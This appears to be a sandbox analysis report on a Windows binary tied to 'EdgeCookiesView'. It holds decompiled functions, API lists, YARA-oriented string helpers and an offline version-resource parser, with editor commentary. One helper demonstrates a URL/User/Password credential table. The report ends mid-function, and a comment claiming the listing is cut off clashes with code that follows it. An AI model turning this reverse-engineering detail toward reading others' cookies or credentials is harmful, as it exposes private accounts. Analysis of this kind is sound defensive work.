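    r = colorref & 0xFF
    g = (colorref >> 8) & 0xFF
    b = (colorref >> 16) & 0xFF
    return "%02x%02x%02x" % (r, g, b)


def build_table_header(bgcolor, fontcolor, columns, colour=colour_string):
    """Emulate E00409190 and return the chunks handed to E00408857, in order.

    columns: list of (title, width) pairs.  ASSUMPTION on the names; the
    8-byte stride and the two pointer reads per record are in the
    decompilation.  Slicing mirrors the _snwprintf count limits.
    """
    # Stage 1: optional bgcolor attribute for the <tr>.
    bg_attr = ""
    if bgcolor != NO_COLOUR:
        bg_attr = (FMT_BGCOLOR % colour(bgcolor))[:SMALL_LIMIT]

    # Stage 2: optional <font> wrapper applied to every header cell.
    font_open = font_close = ""
    if fontcolor != NO_COLOUR:
        font_open = (FMT_FONT_OPEN % colour(fontcolor))[:SMALL_LIMIT]
        font_close = FMT_FONT_CLOSE

    # Stage 3: table opener, then one <th> per column.
    chunks = [(FMT_TABLE % bg_attr)[:LARGE_LIMIT]]
    for title, width in columns:
        # An empty width string leaves _v516 empty, i.e. no width attribute.
        width_attr = (FMT_WIDTH % width)[:SMALL_LIMIT] if width else ""
        cell = FMT_TH % (width_attr, font_open, title, font_close)
        chunks.append(cell[:LARGE_LIMIT])
    return chunks


REPORT_FORMAT_STRINGS = (FMT_BGCOLOR, FMT_FONT_OPEN, FMT_FONT_CLOSE,
                         FMT_TABLE, FMT_WIDTH, FMT_TH)


def find_wide_strings(blob, strings=REPORT_FORMAT_STRINGS):
    """Return {format_string: [offsets]} for every UTF-16LE occurrence in blob.

    The sample stores these as wide literals, so a byte search (or a YARA
    rule) must use the wide encoding; a plain ASCII search finds nothing.
    """
    hits = {}
    for s in strings:
        needle = s.encode("utf-16-le")
        offsets = []
        pos = blob.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = blob.find(needle, pos + 1)
        if offsets:
            hits[s] = offsets
    return hits


if __name__ == "__main__":
    # Constructed input: a three-column credential table with a red row background.
    for chunk in build_table_header(0x0000FF, NO_COLOUR,
                                    [("URL", "40%"), ("User", ""), ("Password", "")]):
        print(repr(chunk))
    # Constructed "dump": padding plus two of the literals in wide encoding.
    dump = (b"\x00" * 4 + FMT_TH.encode("utf-16-le")
            + b"\x00\x00" + FMT_WIDTH.encode("utf-16-le"))
    print(find_wide_strings(dump))
```

The sandbox's Strings list shows these literals decoded, which hides the encoding; when turning them into a YARA rule, use the `wide` modifier (or the `wide ascii` pair if the same strings might appear narrow elsewhere), otherwise the rule will not match the .text section that this dump was taken from.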

                                                                                                                                                C-Code - Quality: 88%
/* Writes an INI-style language file for the module passed in _a4: a "general"
   section with translator/version keys, then a "strings" section filled from the
   module's menu (RT_MENU = 4) and dialog (RT_DIALOG = 5) resources. _a4 is used as
   an HMODULE; the decompiler's "char" type for it is an artefact. _a8 is a
   caller-supplied wide string copied into the global at 0x412c38. The comments
   were added by the editor; the statements are the decompiler's. */
E00407297(void* __ecx, void* __eflags, char _a4, wchar_t* _a8) {
    void _v530;
    char _v532;      /* path of this module: 0x20a bytes, MAX_PATH WCHARs plus NUL */
    void _v1042;
    long _v1044;     /* version string: 0x200 bytes */
    long _v4116;
    char _v5164;     /* work area filled by E0040674D / E0040DE36 */
    void* __edi;
    char* _t13;      /* _t13, _t14 and _t61 are used below but were left undeclared by the decompiler */
    char* _t14;
    void* _t27;
    void* _t38;
    void* _t44;
    void* _t61;

    E0040E340(0x142c, __ecx);                 /* stack probe for the 0x142c-byte frame */
    _v1044 = 0;
    memset( &_v1042, 0, 0x1fc);               /* zero the version-string buffer */
    _v532 = 0;
    memset( &_v530, 0, 0x208);                /* zero the path buffer */
    E00405800( &_v532);                       /* GetModuleFileNameW: own path (see APIs below) */
    _pop(_t44);                               /* cdecl stack clean-up, decompiler artefact */
    E0040674D( &_v5164);
    _t27 = E0040DE36( &_v5164,  &_v532);      /* GetFileVersionInfoSizeW/GetFileVersionInfoW on that path,
                                                 VerQueryValueW(\VarFileInfo\Translation), then _snwprintf
                                                 builds the \StringFileInfo\<lang><cp>\... path (see APIs) */
    _t61 = _t27;
    if(_t27 != 0) {
        wcscpy( &_v1044,  &_v4116);           /* copy the version string out of the work area */
        _pop(_t44);
    }
    wcscpy(0x412c38, _a8);                    /* global 0x412c38: caller-supplied name */
    wcscpy(0x412e48, L"general");             /* global 0x412e48: current section name */
    E00406DE5(_t61, L"TranslatorName", 0x40f454, 0);   /* key/value writes into the current section;
                                                          0x40f454 points into the 0x40F000 data region,
                                                          its contents are not shown in the report */
    E00406DE5(_t61, L"TranslatorURL", 0x40f454, 0);
    E00406DE5(_t61, L"Version",  &_v1044, 1);
    E00406DE5(_t61, L"RTL", "0", 0);
    _t13 =  &_a4; // 0x40743b
    EnumResourceNamesW( *_t13, 4, E00407047, 0);       /* RT_MENU; E00407047 is the EnumResNameProc callback */
    _t14 =  &_a4; // 0x40743b
    EnumResourceNamesW( *_t14, 5, E00407047, 0);       /* RT_DIALOG, same callback */
    wcscpy(0x412e48, L"strings");             /* switch to the "strings" section */
    _t38 = E00407170(_t44, _t61, _a4);
     *0x412c38 =  *0x412c38 & 0x00000000;     /* clear the global name again (empty string) */
    return _t38;
}
Address column of the listing above, separated from its statements by extraction: 0x0040729f 0x004072b6 0x004072bd 0x004072d2 0x004072d9 0x004072e8 0x004072ed 0x004072f4 0x00407306 0x0040730b 0x0040730d 0x0040731d 0x00407323 0x00407323 0x0040732c 0x0040733c 0x0040734d 0x0040735e 0x00407374 0x00407387 0x0040739e 0x004073a1 0x004073a8 0x004073ab 0x004073b3 0x004073bb 0x004073c3 0x004073cf

APIs
• memset.MSVCRT ref: 004072BD
• memset.MSVCRT ref: 004072D9
  • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
  • Part of subcall function 0040DE36: GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
  • Part of subcall function 0040DE36: ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
  • Part of subcall function 0040DE36: GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
  • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
  • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
  • Part of subcall function 0040DE36: _snwprintf.MSVCRT ref: 0040DEE7
  • Part of subcall function 0040DE36: wcscpy.MSVCRT ref: 0040DF11
• wcscpy.MSVCRT ref: 0040731D
• wcscpy.MSVCRT ref: 0040732C
• wcscpy.MSVCRT ref: 0040733C
• EnumResourceNamesW.KERNEL32(;t@,00000004,00407047,00000000), ref: 004073A1
• EnumResourceNamesW.KERNEL32(?,00000005,00407047,00000000), ref: 004073AB
• wcscpy.MSVCRT ref: 004073B3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
Similarity
• API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
• String ID: ;t@$H.A$RTL$TranslatorName$TranslatorURL$Version$general$strings
• API String ID: 3037099051-2223684028
• Opcode ID: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
• Instruction ID: 5f8ecd76274f380d0de7cb04729dc73bacf1b7add2d1f3ba80cfb94e375ef893
• Opcode Fuzzy Hash: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
• Instruction Fuzzy Hash: 27217872A4021875C730B7529C46FCF3B6CDF44758F14047BB90CB60D2E6F96A988AAD
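The subcall chain listed under APIs for 0040DE36 (GetFileVersionInfoW, VerQueryValueW on \VarFileInfo\Translation, _snwprintf, a second VerQueryValueW, wcscpy) is the standard way to read one string out of a PE version resource: the language/code-page pair from the Translation block is formatted into the \StringFileInfo\<lang><cp>\<key> sub-block path before the string can be queried. The Python below is an added example by the editor, not code from the sample or from the sandbox vendor. It builds a VS_VERSIONINFO blob inline (constructed for the demonstration, not the sample's real resource) and implements the lookup offline, so it runs without version.dll. The key name "FileVersion" is an assumption; the report does not show which key the sample queries (the string at 0x40F964 is not listed), and only the first translation pair is used.

```python
"""Offline model of the version-string lookup seen in the report's subcall chain:
GetFileVersionInfoW -> VerQueryValueW("\\VarFileInfo\\Translation") -> _snwprintf ->
VerQueryValueW("\\StringFileInfo\\<lang><codepage>\\<key>") -> wcscpy.
Added example, not code from the sample; the VS_VERSIONINFO blob is constructed
here so the lookup runs without version.dll."""
import struct


def _pad4(data: bytes) -> bytes:
    """DWORD-align a buffer; every node value and every child starts 4-aligned."""
    return data + b"\0" * (-len(data) % 4)


def build_node(key: str, value=b"", is_text: bool = False, children=()) -> bytes:
    """Serialise one VS_VERSIONINFO-style node: WORD wLength, WORD wValueLength,
    WORD wType, NUL-terminated UTF-16 szKey, padding, value, padding, children.
    wValueLength counts WCHARs for text values (wType = 1) and bytes otherwise."""
    if is_text:
        value = (value + "\0").encode("utf-16-le")
    key_bytes = (key + "\0").encode("utf-16-le")
    w_value_len = len(value) // 2 if is_text else len(value)
    body = struct.pack("<HHH", 0, w_value_len, 1 if is_text else 0) + key_bytes
    body = _pad4(body) + value
    for child in children:
        body = _pad4(body) + child
    return struct.pack("<H", len(body)) + body[2:]   # patch wLength in place


def parse_node(blob: bytes, offset: int = 0):
    """Parse the node at offset; returns (key, value_bytes, children, end_offset).
    Nodes that claim no length or run past the buffer are rejected: that is the
    check that stops a hostile blob from spinning the child loop or reading out
    of bounds."""
    if offset + 6 > len(blob):
        raise ValueError("truncated node header at offset %d" % offset)
    w_len, w_value_len, w_type = struct.unpack_from("<HHH", blob, offset)
    end = offset + w_len
    if w_len < 6 or end > len(blob):
        raise ValueError("bad node length at offset %d" % offset)
    pos = offset + 6
    chars = []
    while True:                                  # szKey: UTF-16 code units up to the NUL
        if pos + 2 > end:
            raise ValueError("unterminated key at offset %d" % offset)
        code_unit = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        if code_unit == 0:
            break
        chars.append(chr(code_unit))
    pos = (pos + 3) & ~3
    value_bytes = w_value_len * 2 if w_type == 1 else w_value_len
    if pos + value_bytes > end:
        raise ValueError("value overruns node at offset %d" % offset)
    value = blob[pos:pos + value_bytes]
    pos = (pos + value_bytes + 3) & ~3
    children = []
    while pos < end:
        child = parse_node(blob, pos)
        children.append(child)
        pos = (child[3] + 3) & ~3
    return "".join(chars), value, children, end


def query_value(root, path: str):
    """Model of VerQueryValueW for a sub-block path such as
    "\\StringFileInfo\\040904b0\\FileVersion"; returns the raw value or None.
    Block names are matched case-insensitively here (the hex case varies in
    real resources)."""
    node = root
    for part in path.strip("\\").split("\\"):
        node = next((c for c in node[2] if c[0].lower() == part.lower()), None)
        if node is None:
            return None
    return node[1]


def file_version_string(blob: bytes, key: str = "FileVersion"):
    """The lookup E0040DE36 performs, modelled offline: take the first
    (language, code page) pair from \\VarFileInfo\\Translation, format it into the
    \\StringFileInfo\\%04x%04x\\<key> path (the _snwprintf step) and fetch the
    string. The key name is an assumption; the report does not show the sample's."""
    root = parse_node(blob)
    translation = query_value(root, "\\VarFileInfo\\Translation")
    if translation is None or len(translation) < 4:
        return None
    lang, codepage = struct.unpack_from("<HH", translation, 0)
    raw = query_value(root, "\\StringFileInfo\\%04x%04x\\%s" % (lang, codepage, key))
    if raw is None:
        return None
    return raw.decode("utf-16-le").rstrip("\0")


# Constructed version resource for the demonstration (not the sample's real one).
SAMPLE_BLOB = build_node("VS_VERSION_INFO", children=[
    build_node("StringFileInfo", children=[
        build_node("040904b0", children=[
            build_node("FileVersion", "1.2.3.4", is_text=True),
            build_node("ProductName", "Example", is_text=True),
        ]),
    ]),
    build_node("VarFileInfo", children=[
        build_node("Translation", struct.pack("<HH", 0x0409, 0x04B0)),
    ]),
])

if __name__ == "__main__":
    print(file_version_string(SAMPLE_BLOB))   # 1.2.3.4
```

On a real dump the blob is the RT_VERSION (type 16) resource body; VerQueryValueW does the bounds checking that parse_node repeats here, which matters once the input comes from a sample rather than from a trusted file.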
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
/* Window-message handler of a C++ object (this = __ecx). _a4 is the message id,
   _a8 wParam, _a12 lParam. The decompiler turned the switch into a chain of
   subtractions: _t60 = msg - 0x415, _t69 = msg - 0x416, _t75 = msg - 0x428 and
   _t75 - 0x41 = msg - 0x469. With WM_USER = 0x400 the handled messages are
   WM_USER+2, +0x15, +0x16, +0x28, +0x69 and WM_ACTIVATE (6). At L32 a message id
   stored at this+0x6a0 is compared against _a4 and a flags dword at lParam+0xc is
   tested for 0x08 and 0x40; that layout is consistent with a FINDREPLACE structure
   (Flags at +0xc, FR_FINDNEXT = 0x08, FR_DIALOGTERM = 0x40) and a registered
   find-dialog message, but the report does not name the structure. The comments
   were added by the editor; the listing is cut off in the report inside the
   WM_ACTIVATE branch. */
E0040B813(intOrPtr __ecx, intOrPtr _a4, short _a8, intOrPtr _a12) {
    intOrPtr _v8;
    intOrPtr _v20;
    void* _v24;
    void* _v28;
    void* __ebx;
    void* __esi;
    intOrPtr* _t38;        /* _t38, _t118, _t127, _t132 and _t148 are used below but were left undeclared by the decompiler */
    void* _t60;
    intOrPtr _t64;
    intOrPtr _t66;
    void* _t69;
    void* _t75;
    void* _t97;
    signed int _t105;
    void* _t108;
    intOrPtr _t115;
    intOrPtr _t118;
    signed char _t120;
    signed int _t124;
    intOrPtr _t127;
    intOrPtr _t129;
    intOrPtr _t131;
    intOrPtr _t132;
    intOrPtr* _t134;
    signed int _t136;
    void* _t139;
    signed char _t148;

    _t129 = __ecx;                             /* this */
    _t118 = _a4;                               /* message id */
    _t139 = _t118 - 0x402;
    _v8 = __ecx;
    if(_t139 > 0) {                            /* message above WM_USER+2 */
        _t60 = _t118 - 0x415;
        __eflags = _t60;
        if(_t60 == 0) {                        /* WM_USER+0x15 */
            E0040A459(__ecx);
            _t132 = _t129;
            L31:
            __eflags = 0;
            E0040A1DC(0, _t118, _t132, 0);
            L32:
            _t64 =  *((intOrPtr*)(_t129 + 0x6a0));   /* message id kept in the object */
            if(_t64 != 0 && _a4 == _t64) {
                _t127 = _a12;
                _t120 =  *(_a12 + 0xc);              /* flags dword at lParam+0xc */
                _t148 = _t120 & 0x00000008;
                _t66 =  *((intOrPtr*)(_t129 + 0x69c));
                if((_t120 & 0x00000008) == 0) {      /* 0x08 clear: no "find next" request */
                    __eflags = _t120 & 0x00000040;
                    if((_t120 & 0x00000040) != 0) {  /* 0x40 set: dialog is closing */
                         *0x412c2c =  *0x412c2c & 0x00000000;   /* clear the global at 0x412c2c */
                        __eflags =  *0x412c2c;
                        E004077CB(_t66);
                    }
                } else {
                    E0040990D(_t66, _t148, _t127);    /* run the search with the lParam structure */
                }
            }
            return E00401B1E(_t129, _a4, _a8, _a12);  /* default handling for everything else */
        }
        _t69 = _t60 - 1;
        __eflags = _t69;
        if(_t69 == 0) {                        /* WM_USER+0x16 */
            _t134 = __ecx + 0x69c;
             *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x68))();    /* virtual calls on the object at this+0x69c (vtable slots 0x68 and 0x80) */
            _t118 =  *_t134;
             *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x80))(0);
            L22:
            _t132 = _t129;
            E0040A3BF(_t129);
            goto L31;
        }
        _t75 = _t69 - 0x12;
        __eflags = _t75;
        if(__eflags == 0) {                    /* WM_USER+0x28 */
            E004077CB( *((intOrPtr*)(__ecx + 0x69c)));
        } else {
            __eflags = _t75 - 0x41;
            if(__eflags == 0) {                /* WM_USER+0x69 */
                memcpy( *((intOrPtr*)(__ecx + 0x698)) + 0x228, __ecx + 0x744, 0x200c);   /* 0x200c bytes from this+0x744 into the object at this+0x698 */
                E0040B00A(_t129);
            }
        }
        goto L32;
    }
    if(_t139 == 0) {                           /* WM_USER+2 */
        _t38 = __ecx + 0x280;
         *_t38 =  *(__ecx + 0x280) & 0x00000000;   /* clear the dword at this+0x280 */
        __eflags =  *_t38;
        goto L22;
    }
    if(_t118 == 6) {                           /* WM_ACTIVATE; the listing ends here in the report */
        __eflags = _a8 - 1;                    /* wParam == WA_ACTIVE */
        if(__eflags == 0) {
                                                                                                                                                						PostMessageW( *(__ecx + 0x208), 0x428, 0, 0);
                                                                                                                                                					}
                                                                                                                                                					goto L32;
                                                                                                                                                				}
                                                                                                                                                				if(_t118 == 0xc) {
                                                                                                                                                					__eflags = E0040546C(_a12, L"EdgeCookiesView");
                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                						goto L32;
                                                                                                                                                					}
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                				if(_t118 == 0x20) {
                                                                                                                                                					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x214));
                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                						goto L32;
                                                                                                                                                					}
                                                                                                                                                					SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                                                					return 1;
                                                                                                                                                				}
                                                                                                                                                				if(_t118 == 0x2b) {
                                                                                                                                                					_t115 = _a12;
                                                                                                                                                					__eflags =  *((intOrPtr*)(_t115 + 0x14)) -  *((intOrPtr*)(__ecx + 0x214));
                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                						goto L32;
                                                                                                                                                					}
                                                                                                                                                					__eflags =  *(__ecx + 0x694);
                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                						L14:
                                                                                                                                                						SetBkMode( *(_t115 + 0x18), 1);
                                                                                                                                                						SetTextColor( *(_t115 + 0x18), 0xff0000);
                                                                                                                                                						_t97 = SelectObject( *(_t115 + 0x18),  *(_t129 + 0x694));
                                                                                                                                                						asm("stosd");
                                                                                                                                                						asm("stosd");
                                                                                                                                                						asm("stosd");
                                                                                                                                                						asm("stosd");
                                                                                                                                                						_t131 = _a12;
                                                                                                                                                						_v28 = 0x14;
                                                                                                                                                						_v20 = 5;
                                                                                                                                                						DrawTextExW( *(_t131 + 0x18), _v8 + 0x492, 0xffffffff, _t131 + 0x1c, 0x24,  &_v28);
                                                                                                                                                						SelectObject( *(_t131 + 0x18), _t97);
                                                                                                                                                						_t129 = _v8;
                                                                                                                                                						goto L32;
                                                                                                                                                					}
                                                                                                                                                					_t105 = GetDeviceCaps( *(_t115 + 0x18), 0x5a);
                                                                                                                                                					asm("cdq");
                                                                                                                                                					_t124 = 0x60;
                                                                                                                                                					_t136 = _t105 * 0xe / _t124;
                                                                                                                                                					_t108 =  *(__ecx + 0x694);
                                                                                                                                                					__eflags = _t108;
                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                						DeleteObject(_t108);
                                                                                                                                                						_t16 = __ecx + 0x694;
                                                                                                                                                						 *_t16 =  *(__ecx + 0x694) & 0x00000000;
                                                                                                                                                						__eflags =  *_t16;
                                                                                                                                                					}
                                                                                                                                                					 *(_t129 + 0x694) = E004058D4(_t136);
                                                                                                                                                					goto L14;
                                                                                                                                                				} else {
                                                                                                                                                					if(_t118 == 0x7b) {
                                                                                                                                                						_t126 = _a8;
                                                                                                                                                						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x69c)) + 0x2ac))) {
                                                                                                                                                							E0040B607(__ecx, _t126);
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					goto L32;
                                                                                                                                                				}
                                                                                                                                                			}
Instruction addresses for the listing above: 0x0040b81c to 0x0040ba88 (the per-line address column was separated from the code during extraction).

APIs
• GetDeviceCaps.GDI32(?,0000005A), ref: 0040B8A1
• DeleteObject.GDI32(00000000), ref: 0040B8BD
• SetBkMode.GDI32(?,00000001), ref: 0040B8DC
• SetTextColor.GDI32(?,00FF0000), ref: 0040B8EA
• SelectObject.GDI32(?,00000000), ref: 0040B8FF
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 0040B935
• SelectObject.GDI32(00000014,00000000), ref: 0040B93F
  • Part of subcall function 0040B607: GetCursorPos.USER32(?), ref: 0040B614
  • Part of subcall function 0040B607: GetSubMenu.USER32 ref: 0040B622
  • Part of subcall function 0040B607: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B64F
• GetModuleHandleW.KERNEL32(00000000), ref: 0040B95A
• LoadCursorW.USER32(00000000,00000067), ref: 0040B963
• SetCursor.USER32(00000000), ref: 0040B96A
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040B9B0
• memcpy.MSVCRT ref: 0040B9F9
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: CursorObject$MenuSelectText$CapsColorDeleteDeviceDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
• String ID: EdgeCookiesView
• API String ID: 1858646182-2656830938
• Opcode ID: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
• Instruction ID: ea2783da8998489939a316812c4387a05210a4ff33434ae7ee18e9d7754e5edd
• Opcode Fuzzy Hash: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
• Instruction Fuzzy Hash: 4161BD71310205ABDB24AF64CC85BAAB7A5FF44310F10413AFA09B76E1D778AC618BDD
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040CA5A() {
	void* _t1;
	int _t2;
	struct HINSTANCE__* _t4;

	if( *0x413260 != 0) {
		return _t1;
	}
	_t2 = LoadLibraryW(L"psapi.dll");
	_t4 = _t2;
	if(_t4 == 0) {
		L10:
		return _t2;
	} else {
		_t2 = GetProcAddress(_t4, "GetModuleBaseNameW");
		 *0x4128e8 = _t2;
		if(_t2 != 0) {
			_t2 = GetProcAddress(_t4, "EnumProcessModules");
			 *0x4128e0 = _t2;
			if(_t2 != 0) {
				_t2 = GetProcAddress(_t4, "GetModuleFileNameExW");
				 *0x4128d8 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "EnumProcesses");
					 *0x412b0c = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "GetModuleInformation");
						 *0x4128e4 = _t2;
						if(_t2 != 0) {
							 *0x413260 = 1;
						}
					}
				}
			}
		}
		if( *0x413260 == 0) {
			_t2 = FreeLibrary(_t4);
		}
		goto L10;
	}
}
APIs
• LoadLibraryW.KERNEL32(psapi.dll,?,0040C284), ref: 0040CA6D
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040CA86
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040CA97
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040CAA8
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040CAB9
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040CACA
• FreeLibrary.KERNEL32(00000000), ref: 0040CAEA
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2449869053-70141382
• Opcode ID: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
• Instruction ID: 77b1fe70fa67b5f7b7b6e6a9f8f9c1ad54eab79ee609772bc806a346005bb9be
• Opcode Fuzzy Hash: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
• Instruction Fuzzy Hash: D101487078120ADDD751EB68AE84BAB3AF49B44B41B144237E405F12D4DBFC9882DF6C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
E0040BCAA(signed int __eax, void* __esi) {
	void* _t5;
	void* _t6;
	void* _t7;
	void* _t8;
	void* _t9;
	void* _t10;

	_push(L"/shtml");
	L0040E03E();
	if(__eax != 0) {
		_push(L"/sverhtml");
		L0040E03E();
		if(__eax != 0) {
			_push(L"/sxml");
			L0040E03E();
			if(__eax != 0) {
				_push(L"/stab");
				L0040E03E();
				if(__eax != 0) {
					_push(L"/sjson");
					L0040E03E();
					if(__eax != 0) {
						_push(L"/scomma");
						L0040E03E();
						if(__eax != 0) {
							_push(L"/scookiestxt");
							L0040E03E();
							asm("sbb eax, eax");
							return ( ~__eax & 0xfffffff8) + 8;
						} else {
							_t5 = 4;
							return _t5;
						}
					} else {
						_t6 = 3;
						return _t6;
					}
				} else {
					_t7 = 2;
					return _t7;
				}
			} else {
				_t8 = 7;
				return _t8;
			}
		} else {
                                                                                                                                                						_t9 = 6;
                                                                                                                                                						return _t9;
                                                                                                                                                					}
                                                                                                                                                				} else {
                                                                                                                                                					_t10 = 5;
                                                                                                                                                					return _t10;
                                                                                                                                                				}
                                                                                                                                                			}










APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/scookiestxt$/shtml$/sjson$/stab$/sverhtml$/sxml
• API String ID: 2081463915-1797186745
• Opcode ID: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
• Instruction ID: 8371893b6cdf142ed748882e6751911a4291a5e673982fbb48e018f7079fe289
• Opcode Fuzzy Hash: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
• Instruction Fuzzy Hash: 7C010C3228936569F9282577AD07B870649CB51BBAF30056FF924E81C1EFED8481605C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040C9D6() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x41325c != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x4128dc = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x4128d4 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x4128d0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x412664 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x4128c8 = _t2;
								if(_t2 != 0) {
									 *0x41325c = 1;
								}
							}
						}
					}
				}
				goto L9;
			}


APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0040C28B), ref: 0040C9E5
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C9FE
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040CA0F
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040CA20
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040CA31
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040CA42
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
• Instruction ID: 7b85a6ede3351e87d48595370c2c99752d77d7c7be9155cf3b7c884c9e88c84f
• Opcode Fuzzy Hash: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
• Instruction Fuzzy Hash: B2F06230651359D9C720EB256E80BEB2BE45785B40F149237E404F22D4EBBC84968FAC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
                                                                                                                                                			E004071D1(void* __eflags, wchar_t* _a4) {
